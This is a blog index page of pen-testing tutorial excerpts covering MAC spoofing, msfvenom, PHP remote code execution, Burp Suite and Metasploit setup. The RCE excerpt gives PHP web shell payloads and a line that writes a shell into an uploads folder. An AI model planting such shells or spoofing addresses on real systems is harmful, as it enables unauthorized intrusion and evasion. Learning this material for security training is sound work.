[ Pen Testing ] :: Step by Step: Changing Your MAC Address

macchanger

This is post 14 of 20 in the series “[ Pen Testing ]” Hide Your Ass, Change Your MAC Manually ifconfig wlan0 down ifconfig ​wlan0 hw ether f1:a7:12:34:1b:c1 ifconfig wlan0 up With macchanger ifconfig wlan0 down # print your MAC macchanger -s wlan0​ # set your MAC macchanger -m 11:22:33:44:55:66 wlan0 # set to a …

[ Pen Testing ] :: Step by Step: msfvenom

This is post 10 of 20 in the series “[ Pen Testing ]” Msfvenom creates shellcode from within Bash. Here is Rapid7’s own excellent documentation: https://github.com/rapid7/metasploit-fraamework/wiki/How-to-use-msfvenom “Complete How to Guide for MSFvenom”: https://securitytraning.com/complete-guide-msfvenom/ And a good thorough walk-through (in Spanish, but with regular English command examples): https://www.hackplayers.com/2018/05/recopilacion-shells-en-windows.html Open Bash and enter: msfvenom to get a …

[ Pen Testing ] :: Step by Step: Remote Code Execution (RCE)

Glenn Norman hacking

This is post 9 of 20 in the series “[ Pen Testing ]” Remote Code Execution RCE PHP RCE Test a form for vulnerability to PHP RCE: <?php phpinfo(); ?> Get a remote PHP shell: <?php system($_GET[“c”]); ?> <?php `$_GET[“c”]`; ?> Upload a file: <?php file_put_contents(‘/var/www/html/uploads/test.php’, ‘<?php system($_GET[“c”]);?>’); ?> Evade file-type upload filters using rot13 …

[ Pen Testing ] :: Step by Step: Burp Suite

This is post 8 of 20 in the series “[ Pen Testing ]” Burp Suite Start with the basics: https://www.cybrary.it/s3ss10n/s3ss10n-wednesday-burp-suite-basics/ Use Burp to Test for Path Traversal Vulnerabilities https://support.portswigger.net/customer/en/portal/articles/2590663-using-burp-to-test-for-path-traversal-vulnerabilities

[ Pen Testing ] :: Step by Step: Metasploit and Armitage

Metasploit

This is post 7 of 20 in the series “[ Pen Testing ]” Metasploit and Armitage Starting Metasploit Generic Metasploit installation instructions for any OS: https://metasploit.help.rapid7.com/docs/installing-the-metasploit-framework Instructions for starting Metasploit in Kali: https://docs.kali.org/general-use/starting-metasploit-framework-in-kali The default install of Metasploit that comes with Kali needs to be initialized. service postgresql start msfdb init # only if necessary …